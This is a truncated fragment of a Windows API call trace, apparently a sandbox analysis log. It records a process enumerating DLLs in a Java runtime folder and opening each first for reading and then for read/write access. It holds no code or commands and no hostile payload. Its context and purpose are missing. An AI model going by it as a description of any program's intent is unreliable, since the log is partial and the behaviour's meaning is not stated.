InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0091.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0091.326] AreFileApisANSI () returned 1 [0091.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0091.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71758 [0091.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 47 [0091.326] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.327] GetFileType (hFile=0x360) returned 0x1 [0091.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0091.327] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.327] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.327] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.327] CloseHandle (hObject=0x360) returned 1 [0091.327] AreFileApisANSI () returned 1 [0091.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0091.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71550 [0091.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71550, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 47 [0091.328] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.328] GetFileType (hFile=0x360) returned 0x1 [0091.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0091.328] CloseHandle (hObject=0x360) returned 1 [0091.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.329] AreFileApisANSI () returned 1 [0091.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0091.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71620 [0091.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 47 [0091.329] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6840)) returned 1 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0091.329] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.329] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.329] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x22240, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jfxmedia.dll", cAlternateFileName="")) returned 1 [0091.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0091.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0091.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0091.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0091.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0091.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0091.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0091.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0091.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0091.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0091.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.330] AreFileApisANSI () returned 1 [0091.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll", lpUsedDefaultChar=0x0) returned 52 [0091.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0091.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0091.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0091.330] AreFileApisANSI () returned 1 [0091.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0091.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0091.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 52 [0091.330] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.330] GetFileType (hFile=0x360) returned 0x1 [0091.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0091.331] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.331] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.331] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.331] CloseHandle (hObject=0x360) returned 1 [0091.331] AreFileApisANSI () returned 1 [0091.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0091.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0091.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 52 [0091.331] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.332] GetFileType (hFile=0x360) returned 0x1 [0091.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0091.332] CloseHandle (hObject=0x360) returned 1 [0091.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.333] AreFileApisANSI () returned 1 [0091.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0091.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0091.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x46b38, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 52 [0091.333] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x22240)) returned 1 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0091.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.333] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7511d3f, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7511d3f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2794a40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jfxwebkit.dll", cAlternateFileName="JFXWEB~1.DLL")) returned 1 [0091.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0091.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0091.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0091.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0091.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0091.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0091.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0091.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0091.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0091.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0091.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0091.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.334] AreFileApisANSI () returned 1 [0091.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll", lpUsedDefaultChar=0x0) returned 53 [0091.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0091.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0091.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0091.334] AreFileApisANSI () returned 1 [0091.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0091.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76188 [0091.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 53 [0091.334] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.335] GetFileType (hFile=0x360) returned 0x1 [0091.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 